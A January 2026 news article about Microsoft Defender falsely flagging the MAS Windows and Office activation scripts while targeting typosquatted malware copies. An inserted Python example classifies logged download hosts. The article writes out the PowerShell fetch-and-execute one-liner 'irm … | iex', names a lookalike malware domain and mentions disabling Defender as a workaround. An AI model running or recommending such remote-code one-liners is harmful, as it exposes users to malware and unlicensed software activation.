Microsoft Defender Blocks Legitimate MAS Amid Fake Script Hunt


David Kimber
January 9, 2026

Microsoft’s Windows Defender has begun blocking the popular open-source Microsoft Activation Scripts (MAS) tool. While targeting impostor scripts, the security solution is doing so without verifying the impact on legitimate versions of the utility.

Users running the genuine PowerShell command now receive “Trojan:PowerShell/FakeMas.DA!MTB” alerts, prompting them to temporarily disable protections. This collateral damage highlights tensions between aggressive antivirus tactics and open-source utilities.

MAS, hosted on GitHub by the Massgrave team, lets users activate Windows and Office via scripts like irm https://get.activated.win | iex.

Recently, cybercriminals exploited its popularity with typosquatted domains, such as get.activate.win (missing the ‘d’), to push malware-laden PowerShell payloads. Microsoft responded swiftly, updating Defender to automatically flag “FakeMas” threats.

False Positive Fallout

Defender’s filter, meant for fakes, now mistakenly hits the official get.activated.win domain due to a likely blacklist glitch.
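
The distinction between the typosquatted host and the official one comes down to a single character, so a triage rule has to compare the full hostname exactly. The following is an added example, not code from the article, Microsoft or the MAS project: it extracts the download host from logged `irm … | iex` command lines and labels it official, lookalike or unrelated. The function names, the distance threshold and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit

OFFICIAL_HOST = "get.activated.win"  # official MAS host named in the article
MAX_DISTANCE = 2  # assumption: this many edits or fewer counts as a lookalike

# Download-and-execute pattern from the article: irm <url> | iex
IRM_IEX = re.compile(r"\birm\s+(\S+)\s*\|\s*iex\b", re.IGNORECASE)

def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance computed with a rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def classify_host(host: str) -> str:
    """Exact match is official; a near miss is a lookalike, never 'close enough'."""
    host = host.lower().rstrip(".")  # normalise case and a trailing FQDN dot
    if host == OFFICIAL_HOST:
        return "official"
    if edit_distance(host, OFFICIAL_HOST) <= MAX_DISTANCE:
        return "lookalike"
    return "unrelated"

def triage(command_line: str):
    """Return (host, verdict) for an irm|iex command line, or None if absent."""
    match = IRM_IEX.search(command_line)
    if not match:
        return None
    url = match.group(1).strip("'\"")
    if "://" not in url:
        url = "https://" + url  # bare host given without a scheme
    host = urlsplit(url).hostname or ""
    return host, classify_host(host)

# Constructed sample command lines (not real telemetry)
SAMPLE_LINES = [
    "irm https://get.activated.win | iex",
    'powershell -c "IRM https://GET.ACTIVATE.WIN | IEX"',
    "irm https://example.com/setup.ps1 | iex",
    "Get-ChildItem C:\\Temp",
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        print(f"{line!r:55} -> {triage(line)}")
```

A rule that matches on a substring or on fuzzy similarity alone would put the official host and get.activate.win in the same bucket, which is the kind of overlap the false positive described above suggests.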

Screenshots circulating online show French-localized alerts: “Trojan:PowerShell/FakeMas.DA!MTB” on legitimate fetches, with options to block or connect via Microsoft. Reddit users report quarantined MAS_AIO.cmd files, fixed only by renaming or exclusions.

Affected users are adding folder exclusions in Windows Security or submitting false-positive reports via Microsoft’s portal. The MAS team confirmed the issue on social media and urged vigilance about the exact domain to avoid malware.

Briefly disabling Defender works but, ironically, exposes systems: real threats could slip through if fake domains evade blocks.

Microsoft’s move underscores Defender’s AMSI integration, which scans PowerShell scripts in real time to thwart fileless attacks. Yet, it raises questions: Did hasty updates prioritize speed over precision? Past MAS flags were dismissed as false positives, but this ties directly to anti-malware efforts.

Cybersecurity experts note that such incidents erode trust in default protections, prompting users to adopt risky tweaks.

As of January 2026, no official Microsoft fix is available; users are monitoring for updates. This saga reminds the community: Even “smart” security can stumble in the typosquatting wars.
